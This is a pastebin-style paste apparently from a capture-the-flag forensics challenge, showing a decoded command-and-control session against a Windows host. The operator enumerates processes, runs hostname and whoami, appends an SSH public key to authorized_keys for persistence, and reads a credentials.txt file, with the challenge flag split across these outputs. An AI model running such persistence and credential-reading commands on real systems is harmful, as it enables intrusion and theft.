Facebook
From ds, 2 Months ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 197
  1. rq : 1BhuY4/niTopIBHAN6vvmQ==
  2.  
  3. infoback;0;10.10.10.22|SRV01|SRV01svc01|Windows 10 Enterprise Evaluation|0.1.6.1
  4.  
  5. rq : procview;
  6.  
  7. procview;svchost?2060;svchost?5316;ApplicationFrameHost?4920;csrss?388;svchost?1372;svchost?832;VBoxTray?2748;fontdrvhost?684;services?576;svchost?3528;lsass?584;svchost?6872;svchost?1552;spoolsv?1748;VBoxService?1156;svchost?760;conhost?4108;svchost?1152;dllhost?6864;svchost?2528;svchost?1936;Memory Compression?1428;RuntimeBroker?4692;svchost?4112;svchost?1932;svchost?748;smss?284;svchost?1140;svchost?6852;svchost?2320;MicrosoftEdge?5076;svchost?1332;svchost?740;svchost?3888;conhost?4896;dwm?340;java?6052;svchost?928;svchost?3488;YourPhone?1320;svchost?1516;dllhost?4204;SearchUI?4664;svchost?328;winlogon?524;SgrmBroker?6628;svchost?2096;svchost?1504;cmd?2488;svchost?1304;NisSrv?2336;MicrosoftEdgeSH?5636;svchost?1104;browser_broker?4592;svchost?1100;svchost?5284;explorer?4052;svchost?1164;svchost?2076;svchost?1680;aQ4caZ?7148;svchost?692;svchost?100;dumpcap?3516;MsMpEng?2260;RuntimeBroker?4820;svchost?1272;Microsoft.Photos?6392;svchost?3436;fontdrvhost?676;cmd?84;taskhostw?3628;RuntimeBroker?6188;RuntimeBroker?1384;java?7028;MicrosoftEdgeCP?5592;svchost?1256;svchost?3816;csrss?464;Registry?68;sihost?3416;SecurityHealthSystray?3156;svchost?6368;svchost?6564;wininit?456;ctfmon?3940;svchost?1636;SecurityHealthService?844;svchost?1040;svchost?2024;svchost?6980;svchost?1628;svchost?1824;svchost?1288;wlms?2216;RuntimeBroker?5564;svchost?5364;svchost?1620;svchost?2012;svchost?396;svchost?6540;RuntimeBroker?6780;WindowsInternal.ComposableShell.Experiences.TextInput.InputApp?2200;svchost?1604;svchost?788;svchost?1400;uhssvc?6824;SearchIndexer?5532;svchost?4940;svchost?3560;svchost?1392;svchost?1588;svchost?1784;wrapper?2176;svchost?2568;ShellExperienceHost?4536;System?4;conhost?2368;OneDrive?1184;svchost?1472;Idle?0;
  8.  
  9. rq : cmd;C:;hostname
  10.  
  11. cmd;C:;srv01
  12.  
  13. rq : cmd;C:;whoami
  14.  
  15. cmd;C:;srv01svc01
  16.  
  17. rq : cmd;C:;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCwyPZCQyJ/s45lt+cRqPhJj5qrSqd8cvhUaDhwsAemRey2r7Ta+wLtkWZobVIFS4HGzRobAw9s3hmFaCKI8GvfgMsxDSmb0bZcAAkl7cMzhA1F418CLlghANAPFM6Aud7DlJZUtJnN2BiTqbrjPmBuTKeBxjtI0uRTXt4JvpDKx9aCMNEDKGcKVz0KX/hejjR/Xy0nJxHWKgudEz3je31cVow6kKqp3ZUxzZz9BQlxU5kRp4yhUUxo3Fbomo6IsmBydqQdB+LbHGURUFLYWlWEy+1otr6JBwpAfzwZOYVEfLypl3Sjg+S6Fd1cH6jBJp/mG2R2zqCKt3jaWH5SJz13 HTB{c0mmun1c4710n5 >> C:Userssvc01.sshauthorized_keys
  18.  
  19. cmd;C:;
  20.  
  21. rq : cmd;C:;dir C:Userssvc01Documents
  22.  
  23. cmd;C:; Volume in drive C is Windows 10
  24.  Volume Serial Number is B4A6-FEC6
  25.  
  26.  Directory of C:Userssvc01Documents
  27.  
  28. 02/28/2024  07:13 AM    <DIR>          .
  29. 02/28/2024  07:13 AM    <DIR>          ..
  30. 02/28/2024  05:14 AM                76 credentials.txt
  31.                1 File(s)             76 bytes
  32.                2 Dir(s)  24,147,230,720 bytes free
  33.  
  34. rq : cmd;C:;type C:Userssvc01Documentscredentials.txt
  35.  
  36. _h45_b33n_r357
  37.  
  38. rq : lsdrives
  39.  
  40. lsdrives;C:|
  41.  
  42. rq : lsfiles
  43. rq : lsfiles-C:
  44. rq : lsfiles-C:
  45.  
  46. lsfiles;C:temp;aQ4caZ.exe?1?29184|